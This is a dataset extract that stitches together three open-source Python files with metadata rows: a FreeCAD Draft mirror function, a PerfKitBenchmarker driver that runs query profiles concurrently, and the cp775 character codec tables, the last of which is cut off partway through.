# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
# * GNU Library General Public License for more details. *
# * *
# * You should have received a copy of the GNU Library General Public *
# * License along with this program; if not, write to the Free Software *
# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
# * USA *
# * *
# ***************************************************************************
"""Provides functions to produce a mirrored object.
It just creates a `Part::Mirroring` object, and sets the appropriate
`Source` and `Normal` properties.
"""
## @package mirror
# \ingroup draftfunctions
# \brief Provides functions to produce a mirrored object.
## \addtogroup draftfuctions
# @{
import FreeCAD as App
import draftutils.utils as utils
import draftutils.gui_utils as gui_utils
from draftutils.messages import _err
from draftutils.translate import translate
if App.GuiUp:
import FreeCADGui as Gui
def mirror(objlist, p1, p2):
"""Create a mirror object from the provided list and line.
It creates a `Part::Mirroring` object from the given `objlist` using
a plane that is defined by the two given points `p1` and `p2`,
and either
- the Draft working plane normal, or
- the negative normal provided by the camera direction
if the working plane normal does not exist and the graphical interface
is available.
If neither of these two is available, it uses as normal the +Z vector.
Parameters
----------
objlist: single object or a list of objects
A single object or a list of objects.
p1: Base::Vector3
Point 1 of the mirror plane. It is also used as the `Placement.Base`
of the resulting object.
p2: Base::Vector3
Point 1 of the mirror plane.
Returns
-------
None
If the operation fails.
list
List of `Part::Mirroring` objects, or a single one
depending on the input `objlist`.
To Do
-----
Implement a mirror tool specific to the workbench that does not
just use `Part::Mirroring`. It should create a derived object,
that is, it should work similar to `Draft.offset`.
"""
utils.print_header('mirror', "Create mirror")
if not objlist:
_err(translate("draft","No object given"))
return
if p1 == p2:
_err(translate("draft","The two points are coincident"))
return
if not isinstance(objlist, list):
objlist = [objlist]
if hasattr(App, "DraftWorkingPlane"):
norm = App.DraftWorkingPlane.getNormal()
elif App.GuiUp:
norm = Gui.ActiveDocument.ActiveView.getViewDirection().negative()
else:
norm = App.Vector(0, 0, 1)
pnorm = p2.sub(p1).cross(norm).normalize()
result = []
for obj in objlist:
mir = App.ActiveDocument.addObject("Part::Mirroring", "mirror")
mir.Label = obj.Label + " (" + translate("draft","mirrored") + ") "
mir.Source = obj
mir.Base = p1
mir.Normal = pnorm
gui_utils.format_object(mir, obj)
result.append(mir)
if len(result) == 1:
result = result[0]
gui_utils.select(result)
return result
## @}
| lgpl-2.1 | 2,656,797,352,616,214,500 | 35.333333 | 77 | 0.562473 | false |
GoogleCloudPlatform/PerfKitBenchmarker | perfkitbenchmarker/data/edw/multistream_multiprofile_driver.py | 1 | 2591 | """Driver for running multiple profiles concurrently against a cluster.
The list of profiles are passed via flag each of which are defined in the
profile_details module.
"""
__author__ = 'p3rf@google.com'
import json
import logging
from multiprocessing import Process
from multiprocessing import Queue
import time
from absl import app
from absl import flags
import unistream_profile_driver
flags.DEFINE_list('profile_list', None, 'List of profiles. Each will be run on '
'its own process to simulate '
'concurrency.')
flags.mark_flags_as_required(['profile_list'])
FLAGS = flags.FLAGS
def process_profile(profile, response_q):
"""Method to execute a profile (list of sql scripts) on a cluster.
Args:
profile: The profile to run.
response_q: Communication channel between processes.
"""
profile_output = unistream_profile_driver.execute_profile(profile)
response_q.put([profile, profile_output])
def manage_streams():
"""Method to launch concurrent execution of multiple profiles.
Returns:
A dictionary containing
1. wall_time: Total time taken for all the profiles to complete execution.
2. profile details:
2.1. profile_execution_time: Time taken for all scripts in the profile to
complete execution.
2.2. Individual script metrics: script name and its execution time (-1 if
the script fails)
"""
profile_handling_process_list = []
profile_performance = Queue()
start_time = time.time()
for profile in FLAGS.profile_list:
profile_handling_process = Process(target=process_profile,
args=(profile, profile_performance,))
profile_handling_process.start()
profile_handling_process_list.append(profile_handling_process)
for profile_handling_process in profile_handling_process_list:
profile_handling_process.join()
# All processes have joined, implying all profiles have been completed
execution_time = round((time.time() - start_time), 2)
num_profiles = len(FLAGS.profile_list)
overall_performance = {}
while num_profiles:
temp_performance_response = profile_performance.get()
profile = temp_performance_response[0]
overall_performance[profile] = json.loads(temp_performance_response[1])
num_profiles -= 1
overall_performance['wall_time'] = execution_time
return json.dumps(overall_performance)
def main(argv):
del argv
print(manage_streams())
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
app.run(main)
| apache-2.0 | -1,865,130,433,890,418,700 | 27.788889 | 80 | 0.699344 | false |
RiccardoPecora/MP | Lib/encodings/cp775.py | 93 | 35429 | """ Python Character Mapping Codec cp775 generated from 'VENDORS/MICSFT/PC/CP775.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_map)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_map)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='cp775',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Map
decoding_map = codecs.make_identity_dict(range(256))
decoding_map.update({
0x0080: 0x0106, # LATIN CAPITAL LETTER C WITH ACUTE
0x0081: 0x00fc, # LATIN SMALL LETTER U WITH DIAERESIS
0x0082: 0x00e9, # LATIN SMALL LETTER E WITH ACUTE
0x0083: 0x0101, # LATIN SMALL LETTER A WITH MACRON
0x0084: 0x00e4, # LATIN SMALL LETTER A WITH DIAERESIS
0x0085: 0x0123, # LATIN SMALL LETTER G WITH CEDILLA
0x0086: 0x00e5, # LATIN SMALL LETTER A WITH RING ABOVE
0x0087: 0x0107, # LATIN SMALL LETTER C WITH ACUTE
0x0088: 0x0142, # LATIN SMALL LETTER L WITH STROKE
0x0089: 0x0113, # LATIN SMALL LETTER E WITH MACRON
0x008a: 0x0156, # LATIN CAPITAL LETTER R WITH CEDILLA
0x008b: 0x0157, # LATIN SMALL LETTER R WITH CEDILLA
0x008c: 0x012b, # LATIN SMALL LETTER I WITH MACRON
0x008d: 0x0179, # LATIN CAPITAL LETTER Z WITH ACUTE
0x008e: 0x00c4, # LATIN CAPITAL LETTER A WITH DIAERESIS
0x008f: 0x00c5, # LATIN CAPITAL LETTER A WITH RING ABOVE
0x0090: 0x00c9, # LATIN CAPITAL LETTER E WITH ACUTE
0x0091: 0x00e6, # LATIN SMALL LIGATURE AE
0x0092: 0x00c6, # LATIN CAPITAL LIGATURE AE
0x0093: 0x014d, # LATIN SMALL LETTER O WITH MACRON
0x0094: 0x00f6, # LATIN SMALL LETTER O WITH DIAERESIS
0x0095: 0x0122, # LATIN CAPITAL LETTER G WITH CEDILLA
0x0096: 0x00a2, # CENT SIGN
0x0097: 0x015a, # LATIN CAPITAL LETTER S WITH ACUTE
0x0098: 0x015b, # LATIN SMALL LETTER S WITH ACUTE
0x0099: 0x00d6, # LATIN CAPITAL LETTER O WITH DIAERESIS
0x009a: 0x00dc, # LATIN CAPITAL LETTER U WITH DIAERESIS
0x009b: 0x00f8, # LATIN SMALL LETTER O WITH STROKE
0x009c: 0x00a3, # POUND SIGN
0x009d: 0x00d8, # LATIN CAPITAL LETTER O WITH STROKE
0x009e: 0x00d7, # MULTIPLICATION SIGN
0x009f: 0x00a4, # CURRENCY SIGN
0x00a0: 0x0100, # LATIN CAPITAL LETTER A WITH MACRON
0x00a1: 0x012a, # LATIN CAPITAL LETTER I WITH MACRON
0x00a2: 0x00f3, # LATIN SMALL LETTER O WITH ACUTE
0x00a3: 0x017b, # LATIN CAPITAL LETTER Z WITH DOT ABOVE
0x00a4: 0x017c, # LATIN SMALL LETTER Z WITH DOT ABOVE
0x00a5: 0x017a, # LATIN SMALL LETTER Z WITH ACUTE
0x00a6: 0x201d, # RIGHT DOUBLE QUOTATION MARK
0x00a7: 0x00a6, # BROKEN BAR
0x00a8: 0x00a9, # COPYRIGHT SIGN
0x00a9: 0x00ae, # REGISTERED SIGN
0x00aa: 0x00ac, # NOT SIGN
0x00ab: 0x00bd, # VULGAR FRACTION ONE HALF
0x00ac: 0x00bc, # VULGAR FRACTION ONE QUARTER
0x00ad: 0x0141, # LATIN CAPITAL LETTER L WITH STROKE
0x00ae: 0x00ab, # LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00af: 0x00bb, # RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00b0: 0x2591, # LIGHT SHADE
0x00b1: 0x2592, # MEDIUM SHADE
0x00b2: 0x2593, # DARK SHADE
0x00b3: 0x2502, # BOX DRAWINGS LIGHT VERTICAL
0x00b4: 0x2524, # BOX DRAWINGS LIGHT VERTICAL AND LEFT
0x00b5: 0x0104, # LATIN CAPITAL LETTER A WITH OGONEK
0x00b6: 0x010c, # LATIN CAPITAL LETTER C WITH CARON
0x00b7: 0x0118, # LATIN CAPITAL LETTER E WITH OGONEK
0x00b8: 0x0116, # LATIN CAPITAL LETTER E WITH DOT ABOVE
0x00b9: 0x2563, # BOX DRAWINGS DOUBLE VERTICAL AND LEFT
0x00ba: 0x2551, # BOX DRAWINGS DOUBLE VERTICAL
0x00bb: 0x2557, # BOX DRAWINGS DOUBLE DOWN AND LEFT
0x00bc: 0x255d, # BOX DRAWINGS DOUBLE UP AND LEFT
0x00bd: 0x012e, # LATIN CAPITAL LETTER I WITH OGONEK
0x00be: 0x0160, # LATIN CAPITAL LETTER S WITH CARON
0x00bf: 0x2510, # BOX DRAWINGS LIGHT DOWN AND LEFT
0x00c0: 0x2514, # BOX DRAWINGS LIGHT UP AND RIGHT
0x00c1: 0x2534, # BOX DRAWINGS LIGHT UP AND HORIZONTAL
0x00c2: 0x252c, # BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
0x00c3: 0x251c, # BOX DRAWINGS LIGHT VERTICAL AND RIGHT
0x00c4: 0x2500, # BOX DRAWINGS LIGHT HORIZONTAL
0x00c5: 0x253c, # BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
0x00c6: 0x0172, # LATIN CAPITAL LETTER U WITH OGONEK
0x00c7: 0x016a, # LATIN CAPITAL LETTER U WITH MACRON
0x00c8: 0x255a, # BOX DRAWINGS DOUBLE UP AND RIGHT
0x00c9: 0x2554, # BOX DRAWINGS DOUBLE DOWN AND RIGHT
0x00ca: 0x2569, # BOX DRAWINGS DOUBLE UP AND HORIZONTAL
0x00cb: 0x2566, # BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
0x00cc: 0x2560, # BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
0x00cd: 0x2550, # BOX DRAWINGS DOUBLE HORIZONTAL
0x00ce: 0x256c, # BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
0x00cf: 0x017d, # LATIN CAPITAL LETTER Z WITH CARON
0x00d0: 0x0105, # LATIN SMALL LETTER A WITH OGONEK
0x00d1: 0x010d, # LATIN SMALL LETTER C WITH CARON
0x00d2: 0x0119, # LATIN SMALL LETTER E WITH OGONEK
0x00d3: 0x0117, # LATIN SMALL LETTER E WITH DOT ABOVE
0x00d4: 0x012f, # LATIN SMALL LETTER I WITH OGONEK
0x00d5: 0x0161, # LATIN SMALL LETTER S WITH CARON
0x00d6: 0x0173, # LATIN SMALL LETTER U WITH OGONEK
0x00d7: 0x016b, # LATIN SMALL LETTER U WITH MACRON
0x00d8: 0x017e, # LATIN SMALL LETTER Z WITH CARON
0x00d9: 0x2518, # BOX DRAWINGS LIGHT UP AND LEFT
0x00da: 0x250c, # BOX DRAWINGS LIGHT DOWN AND RIGHT
0x00db: 0x2588, # FULL BLOCK
0x00dc: 0x2584, # LOWER HALF BLOCK
0x00dd: 0x258c, # LEFT HALF BLOCK
0x00de: 0x2590, # RIGHT HALF BLOCK
0x00df: 0x2580, # UPPER HALF BLOCK
0x00e0: 0x00d3, # LATIN CAPITAL LETTER O WITH ACUTE
0x00e1: 0x00df, # LATIN SMALL LETTER SHARP S (GERMAN)
0x00e2: 0x014c, # LATIN CAPITAL LETTER O WITH MACRON
0x00e3: 0x0143, # LATIN CAPITAL LETTER N WITH ACUTE
0x00e4: 0x00f5, # LATIN SMALL LETTER O WITH TILDE
0x00e5: 0x00d5, # LATIN CAPITAL LETTER O WITH TILDE
0x00e6: 0x00b5, # MICRO SIGN
0x00e7: 0x0144, # LATIN SMALL LETTER N WITH ACUTE
0x00e8: 0x0136, # LATIN CAPITAL LETTER K WITH CEDILLA
0x00e9: 0x0137, # LATIN SMALL LETTER K WITH CEDILLA
0x00ea: 0x013b, # LATIN CAPITAL LETTER L WITH CEDILLA
0x00eb: 0x013c, # LATIN SMALL LETTER L WITH CEDILLA
0x00ec: 0x0146, # LATIN SMALL LETTER N WITH CEDILLA
0x00ed: 0x0112, # LATIN CAPITAL LETTER E WITH MACRON
0x00ee: 0x0145, # LATIN CAPITAL LETTER N WITH CEDILLA
0x00ef: 0x2019, # RIGHT SINGLE QUOTATION MARK
0x00f0: 0x00ad, # SOFT HYPHEN
0x00f1: 0x00b1, # PLUS-MINUS SIGN
0x00f2: 0x201c, # LEFT DOUBLE QUOTATION MARK
0x00f3: 0x00be, # VULGAR FRACTION THREE QUARTERS
0x00f4: 0x00b6, # PILCROW SIGN
0x00f5: 0x00a7, # SECTION SIGN
0x00f6: 0x00f7, # DIVISION SIGN
0x00f7: 0x201e, # DOUBLE LOW-9 QUOTATION MARK
0x00f8: 0x00b0, # DEGREE SIGN
0x00f9: 0x2219, # BULLET OPERATOR
0x00fa: 0x00b7, # MIDDLE DOT
0x00fb: 0x00b9, # SUPERSCRIPT ONE
0x00fc: 0x00b3, # SUPERSCRIPT THREE
0x00fd: 0x00b2, # SUPERSCRIPT TWO
0x00fe: 0x25a0, # BLACK SQUARE
0x00ff: 0x00a0, # NO-BREAK SPACE
})
### Decoding Table
decoding_table = (
u'\x00' # 0x0000 -> NULL
u'\x01' # 0x0001 -> START OF HEADING
u'\x02' # 0x0002 -> START OF TEXT
u'\x03' # 0x0003 -> END OF TEXT
u'\x04' # 0x0004 -> END OF TRANSMISSION
u'\x05' # 0x0005 -> ENQUIRY
u'\x06' # 0x0006 -> ACKNOWLEDGE
u'\x07' # 0x0007 -> BELL
u'\x08' # 0x0008 -> BACKSPACE
u'\t' # 0x0009 -> HORIZONTAL TABULATION
u'\n' # 0x000a -> LINE FEED
u'\x0b' # 0x000b -> VERTICAL TABULATION
u'\x0c' # 0x000c -> FORM FEED
u'\r' # 0x000d -> CARRIAGE RETURN
u'\x0e' # 0x000e -> SHIFT OUT
u'\x0f' # 0x000f -> SHIFT IN
u'\x10' # 0x0010 -> DATA LINK ESCAPE
u'\x11' # 0x0011 -> DEVICE CONTROL ONE
u'\x12' # 0x0012 -> DEVICE CONTROL TWO
u'\x13' # 0x0013 -> DEVICE CONTROL THREE
u'\x14' # 0x0014 -> DEVICE CONTROL FOUR
u'\x15' # 0x0015 -> NEGATIVE ACKNOWLEDGE
u'\x16' # 0x0016 -> SYNCHRONOUS IDLE
u'\x17' # 0x0017 -> END OF TRANSMISSION BLOCK
u'\x18' # 0x0018 -> CANCEL
u'\x19' # 0x0019 -> END OF MEDIUM
u'\x1a' # 0x001a -> SUBSTITUTE
u'\x1b' # 0x001b -> ESCAPE
u'\x1c' # 0x001c -> FILE SEPARATOR
u'\x1d' # 0x001d -> GROUP SEPARATOR
u'\x1e' # 0x001e -> RECORD SEPARATOR
u'\x1f' # 0x001f -> UNIT SEPARATOR
u' ' # 0x0020 -> SPACE
u'!' # 0x0021 -> EXCLAMATION MARK
u'"' # 0x0022 -> QUOTATION MARK
u'#' # 0x0023 -> NUMBER SIGN
u'$' # 0x0024 -> DOLLAR SIGN
u'%' # 0x0025 -> PERCENT SIGN
u'&' # 0x0026 -> AMPERSAND
u"'" # 0x0027 -> APOSTROPHE
u'(' # 0x0028 -> LEFT PARENTHESIS
u')' # 0x0029 -> RIGHT PARENTHESIS
u'*' # 0x002a -> ASTERISK
u'+' # 0x002b -> PLUS SIGN
u',' # 0x002c -> COMMA
u'-' # 0x002d -> HYPHEN-MINUS
u'.' # 0x002e -> FULL STOP
u'/' # 0x002f -> SOLIDUS
u'0' # 0x0030 -> DIGIT ZERO
u'1' # 0x0031 -> DIGIT ONE
u'2' # 0x0032 -> DIGIT TWO
u'3' # 0x0033 -> DIGIT THREE
u'4' # 0x0034 -> DIGIT FOUR
u'5' # 0x0035 -> DIGIT FIVE
u'6' # 0x0036 -> DIGIT SIX
u'7' # 0x0037 -> DIGIT SEVEN
u'8' # 0x0038 -> DIGIT EIGHT
u'9' # 0x0039 -> DIGIT NINE
u':' # 0x003a -> COLON
u';' # 0x003b -> SEMICOLON
u'<' # 0x003c -> LESS-THAN SIGN
u'=' # 0x003d -> EQUALS SIGN
u'>' # 0x003e -> GREATER-THAN SIGN
u'?' # 0x003f -> QUESTION MARK
u'@' # 0x0040 -> COMMERCIAL AT
u'A' # 0x0041 -> LATIN CAPITAL LETTER A
u'B' # 0x0042 -> LATIN CAPITAL LETTER B
u'C' # 0x0043 -> LATIN CAPITAL LETTER C
u'D' # 0x0044 -> LATIN CAPITAL LETTER D
u'E' # 0x0045 -> LATIN CAPITAL LETTER E
u'F' # 0x0046 -> LATIN CAPITAL LETTER F
u'G' # 0x0047 -> LATIN CAPITAL LETTER G
u'H' # 0x0048 -> LATIN CAPITAL LETTER H
u'I' # 0x0049 -> LATIN CAPITAL LETTER I
u'J' # 0x004a -> LATIN CAPITAL LETTER J
u'K' # 0x004b -> LATIN CAPITAL LETTER K
u'L' # 0x004c -> LATIN CAPITAL LETTER L
u'M' # 0x004d -> LATIN CAPITAL LETTER M
u'N' # 0x004e -> LATIN CAPITAL LETTER N
u'O' # 0x004f -> LATIN CAPITAL LETTER O
u'P' # 0x0050 -> LATIN CAPITAL LETTER P
u'Q' # 0x0051 -> LATIN CAPITAL LETTER Q
u'R' # 0x0052 -> LATIN CAPITAL LETTER R
u'S' # 0x0053 -> LATIN CAPITAL LETTER S
u'T' # 0x0054 -> LATIN CAPITAL LETTER T
u'U' # 0x0055 -> LATIN CAPITAL LETTER U
u'V' # 0x0056 -> LATIN CAPITAL LETTER V
u'W' # 0x0057 -> LATIN CAPITAL LETTER W
u'X' # 0x0058 -> LATIN CAPITAL LETTER X
u'Y' # 0x0059 -> LATIN CAPITAL LETTER Y
u'Z' # 0x005a -> LATIN CAPITAL LETTER Z
u'[' # 0x005b -> LEFT SQUARE BRACKET
u'\\' # 0x005c -> REVERSE SOLIDUS
u']' # 0x005d -> RIGHT SQUARE BRACKET
u'^' # 0x005e -> CIRCUMFLEX ACCENT
u'_' # 0x005f -> LOW LINE
u'`' # 0x0060 -> GRAVE ACCENT
u'a' # 0x0061 -> LATIN SMALL LETTER A
u'b' # 0x0062 -> LATIN SMALL LETTER B
u'c' # 0x0063 -> LATIN SMALL LETTER C
u'd' # 0x0064 -> LATIN SMALL LETTER D
u'e' # 0x0065 -> LATIN SMALL LETTER E
u'f' # 0x0066 -> LATIN SMALL LETTER F
u'g' # 0x0067 -> LATIN SMALL LETTER G
u'h' # 0x0068 -> LATIN SMALL LETTER H
u'i' # 0x0069 -> LATIN SMALL LETTER I
u'j' # 0x006a -> LATIN SMALL LETTER J
u'k' # 0x006b -> LATIN SMALL LETTER K
u'l' # 0x006c -> LATIN SMALL LETTER L
u'm' # 0x006d -> LATIN SMALL LETTER M
u'n' # 0x006e -> LATIN SMALL LETTER N
u'o' # 0x006f -> LATIN SMALL LETTER O
u'p' # 0x0070 -> LATIN SMALL LETTER P
u'q' # 0x0071 -> LATIN SMALL LETTER Q
u'r' # 0x0072 -> LATIN SMALL LETTER R
u's' # 0x0073 -> LATIN SMALL LETTER S
u't' # 0x0074 -> LATIN SMALL LETTER T
u'u' # 0x0075 -> LATIN SMALL LETTER U
u'v' # 0x0076 -> LATIN SMALL LETTER V
u'w' # 0x0077 -> LATIN SMALL LETTER W
u'x' # 0x0078 -> LATIN SMALL LETTER X
u'y' # 0x0079 -> LATIN SMALL LETTER Y
u'z' # 0x007a -> LATIN SMALL LETTER Z
u'{' # 0x007b -> LEFT CURLY BRACKET
u'|' # 0x007c -> VERTICAL LINE
u'}' # 0x007d -> RIGHT CURLY BRACKET
u'~' # 0x007e -> TILDE
u'\x7f' # 0x007f -> DELETE
u'\u0106' # 0x0080 -> LATIN CAPITAL LETTER C WITH ACUTE
u'\xfc' # 0x0081 -> LATIN SMALL LETTER U WITH DIAERESIS
u'\xe9' # 0x0082 -> LATIN SMALL LETTER E WITH ACUTE
u'\u0101' # 0x0083 -> LATIN SMALL LETTER A WITH MACRON
u'\xe4' # 0x0084 -> LATIN SMALL LETTER A WITH DIAERESIS
u'\u0123' # 0x0085 -> LATIN SMALL LETTER G WITH CEDILLA
u'\xe5' # 0x0086 -> LATIN SMALL LETTER A WITH RING ABOVE
u'\u0107' # 0x0087 -> LATIN SMALL LETTER C WITH ACUTE
u'\u0142' # 0x0088 -> LATIN SMALL LETTER L WITH STROKE
u'\u0113' # 0x0089 -> LATIN SMALL LETTER E WITH MACRON
u'\u0156' # 0x008a -> LATIN CAPITAL LETTER R WITH CEDILLA
u'\u0157' # 0x008b -> LATIN SMALL LETTER R WITH CEDILLA
u'\u012b' # 0x008c -> LATIN SMALL LETTER I WITH MACRON
u'\u0179' # 0x008d -> LATIN CAPITAL LETTER Z WITH ACUTE
u'\xc4' # 0x008e -> LATIN CAPITAL LETTER A WITH DIAERESIS
u'\xc5' # 0x008f -> LATIN CAPITAL LETTER A WITH RING ABOVE
u'\xc9' # 0x0090 -> LATIN CAPITAL LETTER E WITH ACUTE
u'\xe6' # 0x0091 -> LATIN SMALL LIGATURE AE
u'\xc6' # 0x0092 -> LATIN CAPITAL LIGATURE AE
u'\u014d' # 0x0093 -> LATIN SMALL LETTER O WITH MACRON
u'\xf6' # 0x0094 -> LATIN SMALL LETTER O WITH DIAERESIS
u'\u0122' # 0x0095 -> LATIN CAPITAL LETTER G WITH CEDILLA
u'\xa2' # 0x0096 -> CENT SIGN
u'\u015a' # 0x0097 -> LATIN CAPITAL LETTER S WITH ACUTE
u'\u015b' # 0x0098 -> LATIN SMALL LETTER S WITH ACUTE
u'\xd6' # 0x0099 -> LATIN CAPITAL LETTER O WITH DIAERESIS
u'\xdc' # 0x009a -> LATIN CAPITAL LETTER U WITH DIAERESIS
u'\xf8' # 0x009b -> LATIN SMALL LETTER O WITH STROKE
u'\xa3' # 0x009c -> POUND SIGN
u'\xd8' # 0x009d -> LATIN CAPITAL LETTER O WITH STROKE
u'\xd7' # 0x009e -> MULTIPLICATION SIGN
u'\xa4' # 0x009f -> CURRENCY SIGN
u'\u0100' # 0x00a0 -> LATIN CAPITAL LETTER A WITH MACRON
u'\u012a' # 0x00a1 -> LATIN CAPITAL LETTER I WITH MACRON
u'\xf3' # 0x00a2 -> LATIN SMALL LETTER O WITH ACUTE
u'\u017b' # 0x00a3 -> LATIN CAPITAL LETTER Z WITH DOT ABOVE
u'\u017c' # 0x00a4 -> LATIN SMALL LETTER Z WITH DOT ABOVE
u'\u017a' # 0x00a5 -> LATIN SMALL LETTER Z WITH ACUTE
u'\u201d' # 0x00a6 -> RIGHT DOUBLE QUOTATION MARK
u'\xa6' # 0x00a7 -> BROKEN BAR
u'\xa9' # 0x00a8 -> COPYRIGHT SIGN
u'\xae' # 0x00a9 -> REGISTERED SIGN
u'\xac' # 0x00aa -> NOT SIGN
u'\xbd' # 0x00ab -> VULGAR FRACTION ONE HALF
u'\xbc' # 0x00ac -> VULGAR FRACTION ONE QUARTER
u'\u0141' # 0x00ad -> LATIN CAPITAL LETTER L WITH STROKE
u'\xab' # 0x00ae -> LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\xbb' # 0x00af -> RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\u2591' # 0x00b0 -> LIGHT SHADE
u'\u2592' # 0x00b1 -> MEDIUM SHADE
u'\u2593' # 0x00b2 -> DARK SHADE
u'\u2502' # 0x00b3 -> BOX DRAWINGS LIGHT VERTICAL
u'\u2524' # 0x00b4 -> BOX DRAWINGS LIGHT VERTICAL AND LEFT
u'\u0104' # 0x00b5 -> LATIN CAPITAL LETTER A WITH OGONEK
u'\u010c' # 0x00b6 -> LATIN CAPITAL LETTER C WITH CARON
u'\u0118' # 0x00b7 -> LATIN CAPITAL LETTER E WITH OGONEK
u'\u0116' # 0x00b8 -> LATIN CAPITAL LETTER E WITH DOT ABOVE
u'\u2563' # 0x00b9 -> BOX DRAWINGS DOUBLE VERTICAL AND LEFT
u'\u2551' # 0x00ba -> BOX DRAWINGS DOUBLE VERTICAL
u'\u2557' # 0x00bb -> BOX DRAWINGS DOUBLE DOWN AND LEFT
u'\u255d' # 0x00bc -> BOX DRAWINGS DOUBLE UP AND LEFT
u'\u012e' # 0x00bd -> LATIN CAPITAL LETTER I WITH OGONEK
u'\u0160' # 0x00be -> LATIN CAPITAL LETTER S WITH CARON
u'\u2510' # 0x00bf -> BOX DRAWINGS LIGHT DOWN AND LEFT
u'\u2514' # 0x00c0 -> BOX DRAWINGS LIGHT UP AND RIGHT
u'\u2534' # 0x00c1 -> BOX DRAWINGS LIGHT UP AND HORIZONTAL
u'\u252c' # 0x00c2 -> BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
u'\u251c' # 0x00c3 -> BOX DRAWINGS LIGHT VERTICAL AND RIGHT
u'\u2500' # 0x00c4 -> BOX DRAWINGS LIGHT HORIZONTAL
u'\u253c' # 0x00c5 -> BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
u'\u0172' # 0x00c6 -> LATIN CAPITAL LETTER U WITH OGONEK
u'\u016a' # 0x00c7 -> LATIN CAPITAL LETTER U WITH MACRON
u'\u255a' # 0x00c8 -> BOX DRAWINGS DOUBLE UP AND RIGHT
u'\u2554' # 0x00c9 -> BOX DRAWINGS DOUBLE DOWN AND RIGHT
u'\u2569' # 0x00ca -> BOX DRAWINGS DOUBLE UP AND HORIZONTAL
u'\u2566' # 0x00cb -> BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
u'\u2560' # 0x00cc -> BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
u'\u2550' # 0x00cd -> BOX DRAWINGS DOUBLE HORIZONTAL
u'\u256c' # 0x00ce -> BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
u'\u017d' # 0x00cf -> LATIN CAPITAL LETTER Z WITH CARON
u'\u0105' # 0x00d0 -> LATIN SMALL LETTER A WITH OGONEK
u'\u010d' # 0x00d1 -> LATIN SMALL LETTER C WITH CARON
u'\u0119' # 0x00d2 -> LATIN SMALL LETTER E WITH OGONEK
u'\u0117' # 0x00d3 -> LATIN SMALL LETTER E WITH DOT ABOVE
u'\u012f' # 0x00d4 -> LATIN SMALL LETTER I WITH OGONEK
u'\u0161' # 0x00d5 -> LATIN SMALL LETTER S WITH CARON
u'\u0173' # 0x00d6 -> LATIN SMALL LETTER U WITH OGONEK
u'\u016b' # 0x00d7 -> LATIN SMALL LETTER U WITH MACRON
u'\u017e' # 0x00d8 -> LATIN SMALL LETTER Z WITH CARON
u'\u2518' # 0x00d9 -> BOX DRAWINGS LIGHT UP AND LEFT
u'\u250c' # 0x00da -> BOX DRAWINGS LIGHT DOWN AND RIGHT
u'\u2588' # 0x00db -> FULL BLOCK
u'\u2584' # 0x00dc -> LOWER HALF BLOCK
u'\u258c' # 0x00dd -> LEFT HALF BLOCK
u'\u2590' # 0x00de -> RIGHT HALF BLOCK
u'\u2580' # 0x00df -> UPPER HALF BLOCK
u'\xd3' # 0x00e0 -> LATIN CAPITAL LETTER O WITH ACUTE
u'\xdf' # 0x00e1 -> LATIN SMALL LETTER SHARP S (GERMAN)
u'\u014c' # 0x00e2 -> LATIN CAPITAL LETTER O WITH MACRON
u'\u0143' # 0x00e3 -> LATIN CAPITAL LETTER N WITH ACUTE
u'\xf5' # 0x00e4 -> LATIN SMALL LETTER O WITH TILDE
u'\xd5' # 0x00e5 -> LATIN CAPITAL LETTER O WITH TILDE
u'\xb5' # 0x00e6 -> MICRO SIGN
u'\u0144' # 0x00e7 -> LATIN SMALL LETTER N WITH ACUTE
u'\u0136' # 0x00e8 -> LATIN CAPITAL LETTER K WITH CEDILLA
u'\u0137' # 0x00e9 -> LATIN SMALL LETTER K WITH CEDILLA
u'\u013b' # 0x00ea -> LATIN CAPITAL LETTER L WITH CEDILLA
u'\u013c' # 0x00eb -> LATIN SMALL LETTER L WITH CEDILLA
u'\u0146' # 0x00ec -> LATIN SMALL LETTER N WITH CEDILLA
u'\u0112' # 0x00ed -> LATIN CAPITAL LETTER E WITH MACRON
u'\u0145' # 0x00ee -> LATIN CAPITAL LETTER N WITH CEDILLA
u'\u2019' # 0x00ef -> RIGHT SINGLE QUOTATION MARK
u'\xad' # 0x00f0 -> SOFT HYPHEN
u'\xb1' # 0x00f1 -> PLUS-MINUS SIGN
u'\u201c' # 0x00f2 -> LEFT DOUBLE QUOTATION MARK
u'\xbe' # 0x00f3 -> VULGAR FRACTION THREE QUARTERS
u'\xb6' # 0x00f4 -> PILCROW SIGN
u'\xa7' # 0x00f5 -> SECTION SIGN
u'\xf7' # 0x00f6 -> DIVISION SIGN
u'\u201e' # 0x00f7 -> DOUBLE LOW-9 QUOTATION MARK
u'\xb0' # 0x00f8 -> DEGREE SIGN
u'\u2219' # 0x00f9 -> BULLET OPERATOR
u'\xb7' # 0x00fa -> MIDDLE DOT
u'\xb9' # 0x00fb -> SUPERSCRIPT ONE
